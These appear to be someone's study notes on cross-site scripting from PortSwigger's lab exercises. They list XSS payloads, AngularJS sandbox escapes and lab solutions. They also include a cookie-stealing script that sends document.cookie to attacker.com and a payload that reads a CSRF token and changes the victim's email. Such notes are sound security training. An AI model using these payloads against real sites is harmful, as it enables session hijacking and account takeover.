Cross-site script (XSS)
Cross-site scripting (XSS) cheat sheet | PortSwigger
When and where to test XSS?
-
URL pattern likes
/?search=xxxxhttps://example.com/?search=<script>alert(1)</script> -
All input areas
The significant effects XXS can cause
Session Hijacking and Credential Theft
<script>
fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>
The attacker receives the session token and uses it to impersonate the victim by including the stolen cookie in their HTTP requests to the web application.
Unauthorized Access: The attacker gains access to the victim’s account, potentially viewing sensitive information, performing transactions, or changing account settings.
Sample XSS commands to check
"><script>alert(1)</script>
"><img src=x onerror=alert(1) >
"><svg onload=alert('XSS')>
payloads
/product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>
// AngularJS expression
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
// Reflected DOM XSS
// {"searchTerm":"\\"-alert(1)}//", "results":[]}
\"-alert(1)}//
// replace() bypass
<><img src=1 onerror=alert(1)>
//?search="><body onresize=print()>" onload=this.style.width='100px'>
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
// ?search=<xss id=x onfocus=alert(document.cookie) tabindex=1>#x';
<script>
location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
// ?search="><svg><animatetransform onbegin=alert(1)>
https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E
// /?'accesskey='x'onclick='alert(1)
https://YOUR-LAB-ID.web-security-academy.net/?%27accesskey=%27x%27onclick=%27alert(1)
To trigger the exploit on yourself, press one of the following key combinations:
On Windows: ALT+SHIFT+X
On MacOS: CTRL+ALT+X
On Linux: Alt+X
</script><script>alert(1)</script>
\'-alert(1)//
http://foo?'-alert(1)-'
http://foo?'-alert(1)-'
${alert(1)}
${4*4}
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
Lab: DOM XSS in document.write sink using source location.search
<script>
function trackSearch(query) {
document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
trackSearch(query);
}
</script>
Solution:
Break out of the img attribute by searching for:
"><svg onload=alert(1)>
Lab: DOM XSS in innerHTML sink using source location.search
<script>
function doSearchQuery(query) {
document.getElementById('searchMessage').innerHTML = query;
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
doSearchQuery(query);
}
</script>
Solution:
Enter the following into the into the search box:
<img src=1 onerror=alert(1)/>
Lab: Reflected XSS into attribute with angle brackets HTML-encoded
<form action=/ method=GET>
<input type=text placeholder='Search the blog...' name=search value="pet">
<button type=submit class=button>Search</button>
</form>
Solution:
Change the value of search
value=""onmouseover="alert(1)"
Need to watch explanation of the following labs:
Lab: DOM XSS in jQuery selector sink using a hashchange event
Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded
DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
Input:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}